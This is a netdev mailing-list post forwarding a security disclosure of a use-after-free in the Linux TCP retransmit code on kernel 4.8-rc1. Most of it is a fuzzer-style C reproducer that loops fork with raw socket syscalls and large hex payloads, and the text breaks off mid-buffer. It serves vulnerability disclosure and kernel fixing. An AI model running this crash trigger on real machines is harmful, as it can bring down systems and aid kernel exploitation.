* Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
@ 2016-08-16 10:45 Greg KH
2016-08-16 15:39 ` Eric Dumazet
0 siblings, 1 reply; 12+ messages in thread
From: Greg KH @ 2016-08-16 10:45 UTC (permalink / raw)
To: netdev; +Cc: Marco Grassi
For some reason Marco's emails can't make it to netdev, so I'm
forwarding this on. Please cc: him on responses.
thanks,
greg k-h
----- Forwarded message from Marco Grassi <marco.gra@gmail.com> -----
Date: Mon, 15 Aug 2016 09:20:17 +0800
From: Marco Grassi <marco.gra@gmail.com>
To: oss-security@lists.openwall.com
Cc: cve-assign@mitre.org
Subject: [oss-security] Linux tcp_xmit_retransmit_queue use after free on
4.8-rc1 / master
Hello, this program will cause a use after free of read 4 in
tcp_xmit_retransmit_queue or other tcp_ functions, often in another totally
unrelated process.
reproducer + KASAN report is provided, tested on master available at the
time of writing and on 4.8 rc1
Thank you
Marco (@marcograss) - https://marcograss.github.io/
-------
// to build clang derp4.c -o derp4 -static
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif
long r[62];
int main(int argc, char **argv)
{
while (1) {
pid_t pid = fork();
if (pid == 0) {
r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);
memcpy((void*)0x20006000,
"\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
128);
r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
memcpy((void*)0x20012f5a,
"\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1",
165);
memcpy((void*)0x20020000,
"\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0",
28);
r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul,
0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);
*(uint32_t*)0x20001fff = (uint32_t)0x2;
r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);
r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
*(uint32_t*)0x20018000 = (uint32_t)0x4;
r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul,
0);
*(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;
*(uint32_t*)0x2000dfd0 = (uint32_t)0xc;
*(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;
*(uint64_t*)0x2000dfe0 = (uint64_t)0x1;
*(uint64_t*)0x2000dfe8 = (uint64_t)0x0;
*(uint64_t*)0x2000dff0 = (uint64_t)0x0;
*(uint32_t*)0x2000dff8 = (uint32_t)0x4;
*(uint16_t*)0x2000e000 = (uint16_t)0x0;
*(uint16_t*)0x2000e002 = (uint16_t)0x0;
*(uint32_t*)0x2000e004 = (uint32_t)0xffff;
*(uint32_t*)0x2000e008 = (uint32_t)0x401;
*(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;
*(uint64_t*)0x20000008 = (uint64_t)0x37;
*(uint32_t*)0x2000ed3a = (uint32_t)0x14;
*(uint16_t*)0x2000ed3e = (uint16_t)0x2;
*(uint16_t*)0x2000ed40 = (uint16_t)0x12;
*(uint32_t*)0x2000ed42 = (uint32_t)0x1f;
*(uint32_t*)0x2000ed46 = (uint32_t)0x7;
*(uint8_t*)0x2000ed4a = (uint8_t)0x6;
*(uint8_t*)0x2000ed4b = (uint8_t)0x100;
*(uint8_t*)0x2000ed4c = (uint8_t)0x3f;
*(uint32_t*)0x2000ed4d = (uint32_t)0x11;
*(uint16_t*)0x2000ed51 = (uint16_t)0x0;
*(uint16_t*)0x2000ed53 = (uint16_t)0x808;
*(uint32_t*)0x2000ed55 = (uint32_t)0x1;
*(uint32_t*)0x2000ed59 = (uint32_t)0x0;
*(uint8_t*)0x2000ed5d = (uint8_t)0x0;
*(uint32_t*)0x2000ed5e = (uint32_t)0x12;
*(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;
*(uint16_t*)0x2000ed64 = (uint16_t)0x200;
*(uint32_t*)0x2000ed66 = (uint32_t)0x5;
*(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;
*(uint8_t*)0x2000ed6e = (uint8_t)0x9;
*(uint8_t*)0x2000ed6f = (uint8_t)0x1;
r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);
*(uint16_t*)0x20001003 = (uint16_t)0x1;
*(uint8_t*)0x20001005 = (uint8_t)0x0;
*(uint32_t*)0x20001007 = (uint32_t)0x9;
r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul,
0x20000ffbul, 0x8ul);
memcpy((void*)0x20015285,
"\xed\xe0\xf1\x03\xbd\x1d\xe2\x8d\x13\x62\xc9\x11\xde\x3b\x55\xb1\xb2\x26\x95\xb2\x3f\x32\x96\x8a\x3d\xf7\xd4\x2c\xd9\x32\xae\x05\x9a\x60\x09\xbc\x49\x63\x6a\x45\xd5\x6f\xa8\x4b\xaf\x8a\x66\xf3\x35\xad\xe6\x68\x85\xd4\x7e\xe5\x7c\x7e\x06\xbf\x32\xfb\xf9\xd2\x9f\x40\xa3\x0a\xa0\x93\x09\x73\x39\x7d\xac\x3c\x8d\x83\xe0\x0c\x5e\xa2\x36\x9b\x9c\xb4\x62\xe8\x39\x07\xd8\x71\xc1\x2f\x6f\x18\xfa\x8a\x5d\x06\xb4\x46\xa2\x97\x79\x81\xb2\x85\xd4\x4f\x6b\x48\xc4\xf5\xdd\xa8\x8d\x10\x74\x01\xe1\x58\xb2\x82\x72\xc4\xb6\xb2\xf7\xaa\x90\x9c\x9f\x61\x95\x87\x7b\x99\xc5\xa5\x53\xbc\xab\xdb\xdb\x5e\x32\xb8\xc3\xee\xd3\xda\x7a\xf2\x5c\xc5\x1a\xf1\xd6\x1b\x53\xad\x24\xd0\xa0\xc0\x0d\x73\x9e\x81\x7e\x4e\x82\xf5\xa9\x73\x3c\x7a\x5c\x6e\x4c\x48\x7d\x42\xf5\x2f\x68\xf9\x7e\xa9\xd8\x6a\x64\x78\x08\x7a\x37\xe9\xd3\x8
1\x15\x34\x63\x63\x14\xb7\x1a\x43\x9b\x4f\x85\xfa\x88\x5c\xe1\x1e\xce\x87\x95\xe1\x81\xc8\x06\xaf\x1a\x64\x26\x36\x83\x36\xef\x71\x0c\x2a\xda\xe4\xff\xa1\x87\xc2\x04\x96\x1c\x72\xd9\x2d\xf0\xce\x46\xd4\x3a\xd1\xc7\x2f\x60\x25\xf8\x33\x1f\x38\x7a\x46\xb1\x43\xa4\xd2\x65\x77\x47\x85\xe9\xad\x52\xdb\x8b\x93\x23\xf1\xf9\xa9\x5f\xe4\xf8\x39\x82\xc5\xb4\xe1\x5b\x87\xa0\xfd\x2c\xc2\x84\x15\x78\xaa\x9b\x3f\xe5\x75\x6e\x05\xef\x84\x4c\x6b\x9d\x1d\x9e\x7c\x92\x3b\x55\xcb\x01\x6f\xc5\x9a\xd8\xc3\x91\x39\x95\xd7\x8f\xe9\x87\x15\x27\xe7\x19\xa8\x18\x24\xfd\x09\x11\x49\x41\xc6\xd2\xe9\x1a\xf4\xb0\x9b\x85\x9b\x3f\xb1\xf3\xc3\x48\xc5\xe7\x45\x0b\x21\x2d\x32\x27\x92\x3c\x39\x52\x0f\x2b\xdf\x52\x66\x6f\x01\x8f\xdc\xfa\x8f\x5e\x53\xb7\x82\x23\x79\xfa\x28\xe5\x24\xa7\x5e\x2a\x24\x7e\xd0\x1e\xd5\x1a\xb6\xb8\
xe5\xb2\x6d\x4d\x38\x61\x79\xb8\xd1\x27\x92\x63\x0c\xed\x3c\xf1\x13\x98\x37\xfa\x98\xda\x0c\x1a\x86\xd1\x6a\x12\x86\x2f\xd0\x8d\x8e\x2e\x52\x23\xac\x2d\x82\x59\xef\x17\xbc\xf1\x47\xfb\xf0\x5f\x43\x70\x99\x14\xdf\xaf\x44\x02\xb5\xe9\x39\x51\x8e\xf2\x07\x9c\xa2\x39\xab\x07\xa2\x22\xa7\xd3\x5c\xc0\x8c\xcf\x3c\xa2\xa7\xd0\xd6\xf4\x82\xcc\x35\x75\x3a\x20\xb7\x9b\xf3\x9d\xd9\xfe\xdf\x1e\x3f\x55\xf2\x99\xdb\xd0\xb2\xd7\x86\xc1\xfa\xb3\xc7\x99\xdc\x02\xe3\x9f\xfd\x1e\x56\xc1\xf2\x51\x32\x84\x61\x30\x33\xf6\xe3\x82\x9f\xf2\x04\xaf\x5d\xf4\x3d\xa6\x0e\x25\x53\xe9\x05\x7c\x42\xbf\xfa\x97\xd7\x77\x8c\x8f\x29\x7a\xcb\x40\x13\x07\xb5\x8d\x69\xdc\x8b\x35\xd3\xb6\xf3\xd8\x07\x94\x7e\x69\x0f\xb7\x28\xf1\xb3\x45\x60\x37\x65\xa4\xf6\xbf\x9c\xb3\xf9\x3d\xe1\x08\x08\xc9\x76\x5e\x8b\x7f\x26\x01\x9d\x8f\x15\x3
9\x02\xfe\x8a\xe3\x3b\x8b\xf9\xae\x06\x04\xef\x0d\xcf\x67\x24\x54\xe6\x4c\xe4\x05\x8e\xd7\xda\x4c\xf2\xd7\x88\x75\x87\xf7\x7e\xd0\x49\x19\x02\x5e\x00\xc4\xeb\x3e\xec\x70\x35\x9c\x9b\xc9\xd9\x47\x65\x4c\xa3\xdb\x0e\xde\x1e\x76\x58\x27\xe0\x91\x6b\xf9\x25\x44\xa6\xa2\x85\x8f\x50\xd0\x13\x88\x57\x25\x56\x78\xed\xcb\x6b\xec\xf2\x4f\xd4\xce\xf1\x90\xcd\x49\x50\xb5\xcf\xd3\x96\x4d\x3c\xf4\x54\x8e\xa9\xdb\xd3\xb5\x9e\xe9\x87\x19\x8b\x59\xd7\xf2\xcf\x1a\xd3\x70\xca\x42\xc6\x97\x66\x38\x24\x39\x4d\x42\xa1\xf0\x24\x46\xe4\x0e\x9c\xbc\xc4\x53\xa9\xb9\x94\x4d\xca\x48\xa6\x04\xb8\x2f\x4f\xf5\x85\x32\x22\xf8\x4e\x83\xab\x34\x27\x3b\x8f\x24\x48\x15\x9b\xa9\xf8\xb9\xb7\xcb\xd5\xfb\x72\xec\x7a\xc3\x39\x9c\xde\x25\x76\x08\x3f\x49\x35\xbd\x42\x4f\x3f\x5e\xfc\x6b\x6b\x9e\x3e\x34\x47\x62\xed\x5a\xae\xdc\xcf\
x4e\xe6\x18\xfa\x7f\xe6\x46\xc8\xbe\xbc\x42\x88\xb6\xfe\xbd\x96\x85\x5a\x4a\x1d\xd2\x00\xe9\x71\x48\x48\x52\xd6\xf5\x88\x7d\x94\x18\xf6\xf0\x5c\x0a\x39\x29\xc8\x78\xa0\xa8\x44\xf4\xb6\xca\x78\x75\x4a\xf7\x53\xd7\x7e\x23\xaf\x6b\xf9\xcd\x77\xb2\xd0\x37\x29\x9c\x57\xbe\x9e\x5f\x7c\xe4\x41\x59\xde\xd5\x63\x02\x2a\xc0\x74\xa6\x00\xe2\x8f\x83\x30\xc1\x60\xcd\xb3\xca\x44\x1d\x88\x54\x8b\xbc\xa8\x79\x78\x86\xa2\x49\x7c\x94\x49\xf3\xb4\x41\x44\x76\x33\xf1\x2e\x71\xbc\xa1\x39\xb9\x68\x56\xd9\xa0\xa1\x6f\xdc\x7d\xa3\xb8\x4f\x1c\xb8\x19\x26\x42\x88\x0e\xcb\xbb\xc9\x6c\xa8\xf8\xe9\x37\x86\x61\x37\x9f\xba\xb3\x9e\x54\x07\xe6\xff\x6f\x54\x8c\xcf\x7e\x3d\x14\xfd\x94\xbb\xdc\x59\x5d\x22\x86\xb5\x3b\x18\x0d\x08\xad\x15\x67\x6b\xf1\xc8\xd8\x81\xac\x14\x63\xcf\x1e\xf9\x48\xba\xe0\x33\x4c\x1e\x72\xe9\x00\x1
a\x48\xc5\xb4\x2c\x71\xd6\x7a\x0b\x8f\x6c\x02\x9a\x02\xa9\x20\xbd\x8a\x56\xe1\x59\x92\x1f\x5f\xea\x61\x1b\xe3\x2f\xc0\x15\x9c\x3e\xcf\xe7\x05\xbc\x7e\xe8\x88\x58\x63\x29\xc5\x10\x26\xf0\xbc\xf5\xcd\x3d\x33\xfa\x87\x45\x25\x1d\x86\xc0\xd8\x72\xdc\x1b\xaf\xa1\xf3\x1e\x81\xb4\x7b\x4d\xb5\x79\x72\x87\x92\x1f\x9d\xa1\x8e\x1a\x24\x7f\x49\x11\xc4\x59\xa5\x8e\x6c\x7a\xdd\x17\x52\x47\x3b\x09\x28\xe4\x3b\xef\xb0\xf3\x68\x9c\xd3\x6e\xe9\x89\x38\xdb\xeb\x01\x4f\x39\x9b\x5b\x0c\x8d\x92\xcd\x5c\x15\x47\x15\xa9\x98\x70\x75\xe2\xf0\x5b\xfe\xaa\xa9\xb3\xba\xc9\x8e\x5c\x6d\xfb\x53\xb9\x8b\x4f\x7e\x31\xbe\x69\x7e\x6d\x80\x6f\x3e\xd8\x59\x1c\x13\x5a\x3b\x2b\x0e\xc6\xd1\xf9\xaa\xf1\x30\x16\xf1\x7b\x2f\x6b\x5f\xa9\xde\xfa\xfd\x59\xaa\xdd\x32\xf7\xbb\x94\x28\x93\x16\xb3\x60\xd5\x6c\x62\x93\xba\xa9\xaa\x38\x52\
xdc\x2f\x37\x75\x1d\x56\xa9\x3c\x7c\x8b\x0d\x56\x9e\x05\xf7\xa1\xa6\xef\x3c\x76\x6e\x06\x06\xde\x07\x84\xa0\xeb\xeb\x8e\x46\x2f\xd9\xc2\x56\xc6\x89\x85\x8c\x39\xad\xa2\x77\x24\xe5\xb5\x00\x04\x4c\xf5\x1e\x4a\x03\x06\xbb\xa1\x1f\xe7\xf8\xb7\x3e\xdd\xfc\x18\xbf\x13\x07\x14\xdd\x8a\x6b\x0f\x44\xc0\xeb\x4a\x43\x7d\x42\xe9\x02\x63\xb5\xc2\x7a\x87\xce\x14\x0c\xaf\xd9\x2b\xaf\x4b\x22\xec\xa9\x3b\x16\xeb\xb7\xc5\x0d\x51\x91\x93\x5d\x90\xe1\x8f\x34\x86\x71\xe0\x7c\xb5\x1e\xe7\x19\xc0\xd6\xc9\x3e\x08\x75\xc0\x1f\xab\x5e\x41\xbf\x0e\x1a\x14\xcc\x40\xf6\x85\x02\xba\x3d\x78\xce\xf7\x6f\x0e\xbf\x51\xda\xc6\xa1\x59\xbd\x69\x1a\x05\x7b\x34\xbd\xa7\x28\x39\xa1\xa2\x18\xa7\x76\x8f\x51\xa5\xd2\xdc\xf4\xa7\x7b\xc8\x64\x0e\xc0\xe8\xac\xc3\xd4\xb9\x11\x78\x58\x79\xe4\x91\xc9\xcf\xe2\x0c\xbb\x11\xb3\x80\x48\xd
7\xa5\xbd\x45\xdd\xb6\xad\x87\x79\x01\xa0\xe1\x89\xdb\x54\x42\x1c\x78\x47\x91\x07\xe8\xbc\x26\x15\xf2\xdb\xba\x5b\xaa\x5a\x05\x84\xa2\x83\x7d\xe5\xbb\x5a\x77\x3f\x0a\x27\x06\x4e\x86\x69\x95\x27\x22\x7e\xa2\x42\x4d\x61\xa7\xab\x6d\x05\x8b\x7b\x6b\x94\xd6\x10\x40\x66\x30\x0b\x6c\x79\xe1\x62\xee\x33\xed\xd6\xd4\x9a\x3a\xea\x95\x5b\x60\x70\x58\xc9\xc6\x6c\x47\xa7\xd1\xcc\xfa\x9f\xc7\x66\xac\xbb\x4f\xe4\x09\x74\xe3\xd1\xeb\x82\x3b\xce\x4c\x2b\xcf\x08\xcd\xf6\x96\x2b\x65\x2a\x2c\x33\xf5\x7b\x66\xdb\xec\x3d\xbf\x24\xf7\xf9\x87\x99\x26\x1b\x5a\xa0\xd0\x0e\x2f\xc0\x2e\x03\xcd\xf4\x1e\x10\x7c\xb5\xb7\xec\x75\x2c\x20\x89\xc4\xec\x61\x34\x3b\x6c\x68\x14\x95\xd9\x9a\x03\xd7\xf2\x6b\xe6\x50\x14\x80\x72\xa2\x67\xaf\xb3\x19\x12\xcc\xf9\x9d\x3d\x34\x86\x48\xe7\xa6\xe7\xc0\x9b\x6c\xeb\x2c\x0d\x26\x6f\x09\
xd9\x8c\x92\x8e\xde\x80\x04\x14\xe6\x88\xbb\x39\x2f\x2c\x14\xf2\xda\x86\xdb\x10\x59\x54\x83\xe6\x5e\xe3\x14\x4b\x73\x97\x9a\x94\xa8\x09\x44\x1d\xd0\x62\x2d\x43\xb4\x5e\x38\xaa\x8e\x5b\xdd\x2f\xd3\x2c\x8e\xd3\xd0\x0f\x9d\x80\xca\x87\x4e\xab\x52\x01\x29\xb7\xe7\x55\xa2\xe4\x2d\xee\xce\x30\xe9\xcb\xc4\x3e\xf9\x58\x04\x63\x01\xec\x89\x33\x01\x26\x7d\xe2\x5d\x41\xf7\x91\xa3\xcb\x41\x62\xb4\x82\x6d\xb9\xd1\xad\xf2\x96\x0f\xad\x87\xbe\x6d\x95\xaf\xc2\x14\x12\x78\x10\x90\x86\x61\x55\x97\x77\x5c\x19\xfe\x4e\xda\xf3\x74\x08\x83\x4d\xa0\x25\x04\x05\x4b\xf3\x30\xc1\x2f\xb6\x16\x2d\x9b\x2c\x7d\x90\x5a\xd2\x28\x53\xc5\x3a\x14\x8c\x1f\xda\xd7\x36\x47\xdc\x85\x7f\x2b\xe8\x0d\xf9\x03\x92\xba\x82\x20\xde\xb3\x65\x14\xe8\xdd\xfe\x6b\x3a\xab\xd5\xad\x03\xcb\x4f\x41\x08\x97\x22\xe7\xc7\x1d\x0e\x7c\x8e\x4d\x1
2\x2c\x86\x8b\xb3\x31\x43\x5f\x6e\x37\xcf\x08\x83\x4d\x16\xd7\x3f\x4a\x80\x2b\x67\x1a\xbb\xaf\x8d\x1c\x1c\x5d\x00\x33\xf3\x67\x13\x43\xf1\x09\x00\x81\x68\xe1\x33\xb1\xb4\xc1\xad\xd9\x99\x0c\xac\x4f\x09\x26\xd7\xff\xc8\xcd\xfd\xe9\x32\x52\xd1\x4c\xee\x61\x89\xe0\x82\x64\xa3\x6b\xeb\x23\x87\xc8\xed\x94\xa6\x6b\x68\xec\x13\x59\xa7\x74\x06\x7d\xac\x6f\xfd\xf5\x3d\x3b\x9d\x8b\xe1\x22\x98\xf3\x0e\xbd\x3f\xfa\xbe\xb9\x86\x3d\xe4\x1f\x30\xd4\x96\x6f\x7f\xd4\x48\xbc\xc9\x8b\x1e\x8f\x63\xa1\xb4\xa9\x43\xf2\xb8\x28\x5e\x57\x93\xc5\x56\x21\x12\x20\xd5\x16\x29\x14\xb0\xff\x42\xba\x0e\x26\x6e\xcd\x7e\x7c\x72\x27\xfb\xd2\x0f\xac\xdb\x0d\xc8\xc8\xd6\xa0\xc7\x5b\xfd\x0c\xd7\x89\xe8\x8b\xee\x24\x0f\xd1\x78\x23\x82\xe7\xb5\x7f\x63\xb3\x14\x10\x78\x26\x23\xd3\x60\xbd\x53\x5a\x1b\x67\x0f\xcf\xd5\xfe\x90\x18\
xa9\xd6\x80\xc3\x94\x00\x21\x6d\xdb\xab\x09\x38\x0d\x77\xdc\x3e\x90\x2f\x3c\x0e\x06\x6b\xaf\x14\x45\xcc\x0d\xcb\x1b\x74\xdc\x01\xec\x29\x23\x96\xe0\x2a\x86\xee\x92\x9c\x86\x10\x9f\x3d\x7a\x56\xf3\x6f\x3b\xef\x2b\x84\xd5\xcf\xd3\xf7\x2b\xa6\x0d\x9c\xa2\xb0\x42\x8f\xed\x53\x99\x7a\x11\x64\x5e\x53\x92\xb7\x97\x20\xaa\x25\xc2\x5d\x6b\xbd\xde\x58\xe7\x51\xc2\xd5\xa5\xe0\x9b\xbf\xe4\x81\x1c\xd5\xc4\xee\x29\xfa\xd2\xbb\xce\xbf\xfe\x40\xee\x09\xf5\x4b\xb2\x1e\x33\xef\x8f\xf9\x05\x68\x15\x7a\x45\xa0\x52\x3c\x29\xf4\x01\xf2\x64\x98\x2d\xbd\x89\xae\x86\x80\xd9\x0a\xfe\xca\x86\x46\xc3\x58\xd6\x1d\x54\xd4\x6f\x36\xe0\x32\x6a\x23\x29\xbd\x69\x22\x9b\x1e\x7f\x01\x28\xff\xc0\x1c\x8f\x01\x08\xa4\x96\xda\xfe\x96\xab\xf2\x23\x34\x34\xb0\x46\x38\xd6\x2f\x87\x62\xcf\x96\x85\xbb\xcc\x98\x27\xfc\x91\xea\xd9\x7
8\xc4\xcb\x42\xc0\xd3\x7d\x90\x1c\xfa\x62\xa8\xb7\xf3\x31\x04\x56\xa1\x97\xe1\xa8\xfc\xab\x90\x64\x01\x81\xae\x20\x05\x2f\x91\xaf\x27\xb9\xb5\x12\xce\x94\xa6\x6b\x32\xf2\xd0\x0b\xf5\x71\xff\xbb\xd8\xe1\x20\x5f\x0d\xbe\x90\x44\xe4\xa5\xb5\xf6\xa3\x70\x5b\xd3\x24\xa2\xb6\xba\x22\xd7\x27\x47\xff\xff\x79\x65\xf1\x82\xcf\x51\x56\xa6\x6f\x48\x32\x66\x7b\x3f\x3f\x7c\xb8\x6f\x0f\x2d\xe8\x92\x72\x86\xc4\x9e\x6f\xe7\xb6\x3f\xb6\x6f\x96\xdc\x68\x8d\x1d\x1c\xfe\x3f\x23\x45\x7d\x35\xed\x3d\x6a\x06\xe8\x4b\x7f\xb1\xe6\x2b\x66\x4a\x53\x45\xa4\x5c\x77\x96\x25\x4a\x13\x3a\xf3\xbe\x7e\x16\xb0\x51\x84\x53\xe6\x4e\x37\xd7\xc1\xee\xda\xfb\x18\xb0\x81\x3b\x16\xfc\xea\x32\x00\x75\x97\x1a\xc9\xf9\x5a\x44\x1a\x12\x08\xcb\xbe\x60\x79\x80\x60\xcd\xbd\x5b\x60\x9b\xfc\x31\x5b\xca\xa5\xda\x16\x18\x45\x95\xe1\x5b\xd4\
x4c\xdc\xc9\x10\x73\x14\xbb\x0b\x9c\xdb\x0c\x0c\x8c\x3b\x42\x29\xf4\x7d\x93\x61\x5a\x6a\x6b\xac\xae\x80\x60\x5d\xd1\x3e\xe4\x6d\xf7\x3f\xb8\x7b\x7f\x35\x1b\x67\xd3\x60\x80\x0a\x08\x25\xff\xbb\x31\x47\x60\xb3\xd1\x0e\xce\xbc\xf3\x88\xe0\x56\x5e\x61\x97\x63\x82\xa4\xff\xea\xf9\x48\x7f\x4c\x62\x58\x46\x30\xe5\x2c\xbe\xa0\x18\xe4\xe8\xf6\x4f\x22\x5b\x1d\x18\xb0\x48\x0c\xe7\x25\xa9\x1a\x8e\x5a\x3f\xbd\x4c\xab\xe7\x52\x29\xa2\x35\x77\xf5\x0c\x8c\x4e\x2d\xa9\x16\x11\x00\xdf\x8b\xe1\x7f\x8f\x20\x9d\xe9\xea\x2b\x4e\xf4\xe5\x98\x4e\xf8\xe9\x5b\x98\xb9\x2a\xb8\x68\x0d\xdb\x35\xf8\xfd\x5d\x28\x14\x2a\x65\x33\x3d\xde\x77\xc5\x73\xee\xc4\xa4\x8e\x76\x12\x4f\x28\x93\x7d\xd8\xf5\xbf\x32\x39\xe1\xc1\xaa\x46\x71\x9f\xcb\xa4\x93\xa5\xae\xe0\xb1\x9f\x03\xb3\xbe\x86\xf9\x92\x45\x65\x64\x8d\xd9\x49\x09\xd2\x0
c\x01\x92\x75\x1a\x29\x43\x34\x74\x21\x6d\xa6\x0e\xa7\x3b\x15\x2c\x59\xc2\xb9\x8a\x92\xcb\xc3\x8c\xc7\x06\xfd\xfc\xe1\x67\xc7\xc5\xc6\x07\x24\xc8\x06\xa7\xdc\x76\x83\x43\xec\x90\x3b\x6f\xa0\x00\x9a\x68\x44\x71\x19\xbe\xdb\x24\xb0\xcb\x9b\x8a\x28\xb6\x30\x99\x79\xd2\x42\xbe\x53\x32\x84\x0c\x17\xdc\xc9\x1c\xa9\xed\x26\x20\x69\xef\x6d\xc4\xa4\xad\xe5\x68\xec\x52\xe8\x51\x3f\xb2\x52\xbc\x6f\x84\x26\x41\xf9\x91\x22\x66\x89\xcc\x03\xa6\xa5\x7a\x07\xd7\x35\x92\x5e\xc1\xf9\x11\x1b\x4b\x6d\x50\x7b\x4f\x43\xca\x13\x37\xd2\x6d\xce\x81\xa8\x9b\x8b\x8c\x65\x75\x08\x97\x18\xb6\xd2\x2e\xd2\xe3\x31\x51\x2e\xb0\xb3\x04\x64\x71\xba\x05\x4b\x23\x91\x92\xfd\x4a\x1b\x6c\x35\xa5\x8f\xcb\xb5\xac\xd9\x40\xe5\x4b\x6b\x04\xe2\x2a\xab\xd9\x0d\xcf\x0b\x23\xfa\x1f\xcd\x4a\x46\xb0\x26\xc4\xb8\xae\x17\x82\x6c\x7f\x6f\
xe6\x1a\x8c\x0d\x95\xdf\xe2\xc2\xd4\x5c\x85\x6d\x79\x3b\x8a\x6c\x51\xf3\x5f\x06\xdf\x07\x5b\x69\x8a\xde\x75\x59\x6d\x70\x99\x55\x09\x8f\xf8\xc0\x6f\x2e\xc3\x0f\x87\x1c\x79\xe8\x4b\xb0\x55\x51\xb2\xa3\x91\x9b\xb0\x89\x17\xad\x9b\x89\x81\x23\x12\xcb\x45\x8a\xd7\x2a\x0a\x19\x84\x7d\xb9\x64\xa6\x31\xa3\x48\x30\x3c\x01\x6b\x7c\x74\x20\xe6\x0b\xff\x2a\x0a\x66\x82\x00\x31\x01\xbc\xf8\x47\x02\xcc\x43\xbe\x6d\x0c\x0e\x4f\x59\x37\x4d\xcb\xc2\x37\xee\x5e\x1c\x2c\xf3\xda\xc8\xf8\xc9\x8c\xbc\xff\xd9\x8b\x8a\xee\x4e\xab\x19\x8f\xb6\xb4\xe7\x0a\xda\x9c\x5c\x00\xc3\x26\x87\x63\xb0\xa9\x1b\x31\x62\xef\x04\x10\x68\x6c\x3c\xd1\xba\x73\xc1\xaa\xf2\xe4\xbd\x29\xdb\x2c\xe3\x69\xf0\x34\x8d\xd3\x6b\x6e\x59\x42\x6f\x28\x3d\x2f\x83\x27\x48\xc0\xb7\x82\xd3\x95\x96\x0c\xdf\x22\xc7\xce\x77\xab\x09\x4c\xad\xab\x0d\x7
0\xee\x4d\xea\xb3\x63\x62\x04\x6f\xd7\x68\x2e\x86\x7c\xac\xd4\xc2\x6e\x09\xdf\xf0\xbe\x8c\x71\xd9\xa8\x82\xf8\xd2\x14\x70\xb7\xd0\x40\x12\x5e\xa7\xec\xab\x1a\x13\x87\x0b\x6e\x28\x59\x76\x01\xb2\x3f\x64\x62\x35\xb3\xff\x0d\x8a\x3d\x6b\x5a\xd3\x9e\x59\x14\x6d\x19\x4c\x99\x04\x75\xe4\x04\xe3\xf2\x8a\x19\x77\x06\xdd\x5f\x2e\x25\x2c\xa3\xb5\x52\xa6\xfa\x2b\x84\x35\xdc\x56\x55\x02\x63\x79\x81\x3b\x27\x82\x41\x92\x19\xb3\xe3\x63\xce\xb5\x0c\x1a\x15\x15\x38\x2a\x52\xf0\xdd\x58\x3d\xa4\x7f\x5b\xb9\xa3\x9c\x90\x14\xf9\x2c\x2b\xaa\x1e\x0d\xfd\xf6\x93\x7e\xbc\xc3\x59\x11\x6e\xd9\x52\x1e\xd0\